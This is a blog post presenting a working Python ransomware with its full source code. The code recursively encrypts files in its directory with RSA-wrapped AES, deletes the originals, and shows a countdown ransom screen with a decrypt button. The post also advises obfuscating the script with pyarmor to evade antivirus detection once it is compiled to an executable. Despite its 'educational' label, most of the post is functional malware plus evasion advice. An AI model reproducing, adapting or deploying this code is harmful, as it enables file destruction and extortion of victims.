Monday, December 19, 2022

A Simple Ransomware in Python

A ransomware is a malicious software(malware) where in this case which I prepared is to encrypt a file and notify the file owner that his file was encrypted and it will only be decrypted after the file owner paid the her(the hacker) some amount of money or any other condition set by the hacker.

The ransomware I created will encrypt all files with an extension not included in a list of the specified file extensions inside the program within the directory where the python script is located. After encrypting all of the files, a screen will appear and just press the decrypt button on the screen to decrypt the files. The resulting encrypted files will have an extension of ".p4wn3d" and the decrypted files will have ''.ransomized".

See the screenshots below:

1. Directory where the ransomware is located:


2. This is the result after the script was executed:



3. The screen appeared after file encryption:



4. This is the result after the decrypt button was pressed:


Anti viruses could detect the python script if converted to a .exe file. To avoid anti virus detection, there a popular method to obfuscate the python script and that is to use pyarmor before compiling it to an executable file.

Pyarmor has tons of features, it can also obfuscate an executable file to include expiring licenses and be able to extend these licenses when needed. Pls do note that I do not promote pyarmor, just sharing what I know that could be useful for anyone beginning to use Python.

Here is the code:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
import os
from pathlib import Path
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP, AES
import tkinter as tk

key = RSA.generate(2048)
privKey = key.export_key()
pubKey = key.publickey().export_key()


def checkFiles(bDir):

    for fil_e in os.scandir(bDir):
        if fil_e.is_file():
            yield fil_e
        else:
            yield from checkFiles(fil_e.path)

def crypter(dFile, publicKey):

 
    extension = dFile.suffix.lower()
    dFile = str(dFile)
    with open(dFile, 'rb') as f:
        f_cont = f.read()
    

    f_cont = bytes(f_cont)


    key = RSA.import_key(publicKey)
    lovekey = os.urandom(16)


    crypty = PKCS1_OAEP.new(key)
    cryptyKey = crypty.encrypt(lovekey)


    crypty = AES.new(lovekey, AES.MODE_EAX)
    cryptytext, tag = crypty.encrypt_and_digest(f_cont)


    fName= dFile.split(extension)[0]
    fileExtn = '.p4wn3d'
    cryptyFile = fName + fileExtn
    with open(cryptyFile, 'wb') as f:
        [ f.write(x) for x in (cryptyKey, crypty.nonce, tag, cryptytext) ]
    os.remove(dFile)

def decryptor(dFile, privateKey):



    extension = dFile.suffix.lower()
 
    key = RSA.import_key(privateKey)

 
    with open(dFile, 'rb') as f:

        encryptedSessionKey, nonce, tag, ciphertext = [ f.read(x) for x in (key.size_in_bytes(), 16, 16, -1) ]

 
    cipher = PKCS1_OAEP.new(key)
    sessionKey = cipher.decrypt(encryptedSessionKey)

 
    cipher = AES.new(sessionKey, AES.MODE_EAX, nonce)
    data = cipher.decrypt_and_verify(ciphertext, tag)


    dFile = str(dFile)
    fileName= dFile.split(extension)[0]
    fileExtension = '.ransomized' 
    decryptedFile = fileName + fileExtension
    with open(decryptedFile, 'wb') as f:
        f.write(data)
    


dir_y = './' 
ftype_excl = ['.py','.pem', '.exe'] 
for fil_e in checkFiles(dir_y): 
    to_encrypt = Path(fil_e)
    fileType = to_encrypt.suffix.lower()

    if fileType in ftype_excl:
        continue
    crypter(to_encrypt, pubKey)

x = 0
def countdown(count):

   global x
   if x == 0:
    hour, minute, second = count.split(':')
    hour = int(hour)
    minute = int(minute)
    second = int(second)

    label['text'] = '{}:{}:{}'.format(hour, minute, second)

    if second > 0 or minute > 0 or hour > 0:
  
        if second > 0:
            second -= 1
        elif minute > 0:
            minute -= 1
            second = 59
        elif hour > 0:
            hour -= 1
            minute = 59
            second = 59
        root.after(1000, countdown, '{}:{}:{}'.format(hour, minute, second))  
def decrypt():
   global x, dir_y, privKey

   inclExtn = ['.p4wn3d'] 

   for fil_e in checkFiles(dir_y): 
    to_decrypt = Path(fil_e)
    fType = to_decrypt.suffix.lower()
   
    if fType in inclExtn:
      decryptor(to_decrypt, privKey)
   label['text'] = 'Decrypted!'
   x = 1
root = tk.Tk()
root.title('P4WN3D Ransomware')
root.geometry('500x300')
root.resizable(False, False)
label1 = tk.Label(root, text='You are p4wn3d! \n This is a demo ransomware! \n For Educational Purposes ONLY! \n', font=('arial', 12,'bold'))
label1.pack()
label = tk.Label(root,font=('arial', 50,'bold'), fg='white', bg='blue')
label.pack()


B = tk.Button(root, text ="Decrypt", command = decrypt, height= 2, width=15)


B.pack()
B.place(x=50, y=200)

# call countdown first time    
countdown('01:00:00')
# root.after(0, countdown, 5)
root.mainloop()

By at
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)